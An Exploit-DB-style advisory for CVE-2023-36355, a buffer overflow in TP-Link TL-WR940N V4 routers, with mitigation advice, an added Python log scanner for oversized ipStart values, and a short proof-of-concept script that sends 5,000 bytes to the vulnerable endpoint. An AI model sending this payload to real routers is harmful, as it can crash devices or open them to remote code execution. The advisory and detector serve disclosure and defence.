Vendor: TP-Link TL-WR940N
By: Amirhossein Bahramizadeh
CVSS: 9.9 (CRITICAL)
Buffer Overflow
CWE: 119
Product Name: TP-Link TL-WR940N
Affected Version From: TP-Link TL-WR940N V4
Affected Version To: TP-Link TL-WR940N V4
Patch Exists: NO
Related CVE: CVE-2023-36355
CPE: o:tp-link:tl-wr940n_firmware
Metasploit:
Other Scripts:
Platforms Tested: Windows, Linux
2023

TP-Link TL-WR940N V4 – Buffer Overflow

This exploit triggers a buffer overflow vulnerability in TP-Link TL-WR940N V4 routers. By sending a crafted payload to the vulnerable endpoint, an attacker can cause a buffer overflow, potentially leading to remote code execution or denial of service. The vulnerability is identified by CVE-2023-36355.

Mitigation:

To mitigate this vulnerability, it is recommended to update the firmware of the TP-Link TL-WR940N V4 router to the latest version provided by the vendor. Additionally, it is advised to restrict access to the router's administration interface only to trusted networks and regularly monitor for any unusual activity.
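
One way to monitor for this, added here as an example and not part of the original advisory or exploit: the Python below scans web-proxy or sensor logs for requests to /userRpm/WanDynamicIpV6CfgRpm whose ipStart value is longer than a textual IPv6 address. The Common Log Format input, the 45-character threshold and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

ENDPOINT = "/userRpm/WanDynamicIpV6CfgRpm"  # endpoint named in the advisory
PARAM = "ipStart"                           # parameter named in the advisory
MAX_LEN = 45  # assumption: longest textual IPv6 address; longer values are suspect

# Assumption: logs are in Common/Combined Log Format (source IP first, quoted request line).
REQUEST_RE = re.compile(r'^(?P<src>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')


def oversized_ipstart(line, max_len=MAX_LEN):
    """Return (source, length) when the line is a request to ENDPOINT whose
    URL-decoded ipStart value is longer than max_len, otherwise None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    # Case-insensitive path match, so a case variant of the path is not missed.
    if parts.path.rstrip("/").lower() != ENDPOINT.lower():
        return None
    # Check every occurrence of the parameter, not only the first one.
    lengths = [len(v) for k, v in parse_qsl(parts.query, keep_blank_values=True)
               if k == PARAM]
    worst = max(lengths, default=0)
    return (m.group("src"), worst) if worst > max_len else None


def scan(lines, max_len=MAX_LEN):
    """Return all (source, length) hits found in an iterable of log lines."""
    hits = (oversized_ipstart(line, max_len) for line in lines)
    return [h for h in hits if h]


# Constructed sample log lines (not captured traffic).
_TS = "[30/Jun/2023:10:00:00 +0000]"
SAMPLE = [
    f'10.0.0.5 - - {_TS} "GET {ENDPOINT}?{PARAM}=2001:db8::10 HTTP/1.1" 200 512',
    f'10.0.0.9 - - {_TS} "GET {ENDPOINT}?{PARAM}={"A" * 5000} HTTP/1.1" 200 0',
    f'10.0.0.9 - - {_TS} "GET /index.html HTTP/1.1" 200 900',
    f'10.0.0.7 - - {_TS} "GET {ENDPOINT}?{PARAM}={"%41" * 100} HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for src, n in scan(SAMPLE):
        print(f"ALERT {src}: {PARAM} length {n} exceeds {MAX_LEN}")
```

Lengths are measured after URL decoding, so a percent-encoded value is counted by the number of bytes it expands to on the device side rather than by its size in the log.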

Exploit-DB raw data:

# Exploit Title: TP-Link TL-WR940N V4 - Buffer OverFlow
# Date: 2023-06-30
# country: Iran
# Exploit Author: Amirhossein Bahramizadeh
# Category : hardware
# Dork : /userRpm/WanDynamicIpV6CfgRpm
# Tested on: Windows/Linux
# CVE : CVE-2023-36355

import requests

# Replace the IP address with the router's IP
router_ip = '192.168.0.1'

# Construct the URL with the vulnerable endpoint and parameter
url = f'http://{router_ip}/userRpm/WanDynamicIpV6CfgRpm?ipStart='

# Replace the payload with a crafted payload that triggers the buffer overflow
payload = 'A' * 5000  # Example payload, adjust the length as needed

# Send the GET request with the crafted payload
response = requests.get(url + payload)

# Check the response status code
if response.status_code == 200:
    print('Buffer overflow triggered successfully')
else:
    print('Buffer overflow not triggered')